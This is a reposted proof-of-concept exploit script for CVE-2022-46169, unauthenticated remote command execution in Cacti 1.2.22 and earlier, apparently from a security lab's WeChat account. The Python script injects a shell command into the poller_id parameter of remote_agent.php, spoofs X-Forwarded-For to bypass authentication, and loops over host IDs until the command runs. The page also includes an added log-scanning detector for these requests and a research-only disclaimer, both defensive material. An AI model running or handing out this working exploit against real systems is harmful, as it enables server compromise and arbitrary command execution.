positional arguments:
  target               URL of the Cacti application.

optional arguments:
  -f FILE              File containing the command
  -c CMD               Command
  --n_host_ids         The range of host_ids to try (0 - n)
  --n_local_data_ids   The range of local_data_ids to try (0 - n)

import requests
import argparse

parser = argparse.ArgumentParser(
    prog='Poc for CVE-2022-46169',
    description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',
    epilog='Author: saspect')
parser.add_argument('target', help='URL of the Cacti application.')
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-f', type=argparse.FileType(),
                   help='File containing the command', dest='file')
group.add_argument('-c', help='Command', dest='cmd')
parser.add_argument(
    '--n_host_ids', help='The range of host_ids to try (0 - n)', default=100, dest='n_ids', type=int)
parser.add_argument(
    '--n_local_data_ids', help='The range of local_data_ids to try (0 - n)', default=50, dest='n_localids', type=int)
args = parser.parse_args()

if args.file:
    # The '-f' argument is supplied, read the command from the file
    cmd = args.file.read().strip()
elif args.cmd:
    # The '-c' argument is supplied, use it as the command
    cmd = args.cmd
else:
    # No command was supplied, print an error message
    parser.print_help()
    exit(1)

payload = f'; /bin/sh -c "{cmd}"'
local_data_ids = [x for x in range(0, args.n_localids)]
target_ip = args.target.split("/")[2]

print(f"[*] Trying for 1 - {args.n_ids} host ids")
for id in range(args.n_ids):
    url = f'{args.target}/remote_agent.php'
    params = {'action': 'polldata', 'host_id': id,
              'poller_id': payload, 'local_data_ids[]': local_data_ids}
    headers = {'X-Forwarded-For': target_ip}
    r = requests.get(url, params=params, headers=headers)
    if('cmd.php' in r.text):
        print(f"[+] Exploit Completed for host_id = {id}")
        break
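
The request this script sends leaves a distinctive trace in web server access logs. The following is an added example, not part of the original PoC: it scans Apache combined-format log lines for polldata requests to remote_agent.php whose poller_id is not a plain integer and groups them by client. The sample log lines are constructed, and treating a legitimate poller_id as a decimal integer is an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Jan/2023:10:00:01 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=1&local_data_ids%5B%5D=6 HTTP/1.1" 200 54 "-" "Cacti"
198.51.100.7 - - [05/Jan/2023:10:02:11 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=0&poller_id=%3B+%2Fbin%2Fsh+-c+%22id%22&local_data_ids%5B%5D=0&local_data_ids%5B%5D=1 HTTP/1.1" 200 61 "-" "python-requests/2.28.1"
198.51.100.7 - - [05/Jan/2023:10:02:12 +0000] "GET /cacti/remote_agent.php?action=polldata&host_id=1&poller_id=%3B+%2Fbin%2Fsh+-c+%22id%22&local_data_ids%5B%5D=0&local_data_ids%5B%5D=1 HTTP/1.1" 200 61 "-" "python-requests/2.28.1"
203.0.113.5 - - [05/Jan/2023:10:03:00 +0000] "GET /cacti/index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Captures the client address and the request target of a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3} ')


def suspicious_polldata(lines):
    """Group polldata requests with a non-integer poller_id by client address."""
    hits = defaultdict(lambda: {"requests": 0, "host_ids": set(), "poller_ids": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/remote_agent.php"):
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        if "polldata" not in query.get("action", []):
            continue
        # Assumption: a legitimate poller_id is a plain decimal integer.
        bad = [v for v in query.get("poller_id", []) if not re.fullmatch(r"[0-9]+", v)]
        if not bad:
            continue
        entry = hits[client]
        entry["requests"] += 1
        entry["host_ids"].update(query.get("host_id", []))
        entry["poller_ids"].update(bad)
    # Convert sets to sorted lists so the result is stable and serialisable.
    return {c: {"requests": e["requests"],
                "host_ids": sorted(e["host_ids"]),
                "poller_ids": sorted(e["poller_ids"])} for c, e in hits.items()}


if __name__ == "__main__":
    for client, info in suspicious_polldata(SAMPLE_LOG.splitlines()).items():
        print(client, info)
```

A single client that walks through many consecutive host_id values with the same non-numeric poller_id matches the loop in the script above.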

Originally published on the WeChat official account Khan安全攻防实验室 (Khan Security Attack and Defense Lab): PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22
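Disclaimer: The programs (methods) discussed in this article may be offensive in nature and are provided for security research and teaching only. Readers who put this information to other uses bear all legal and joint liability themselves; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page). Please be advised.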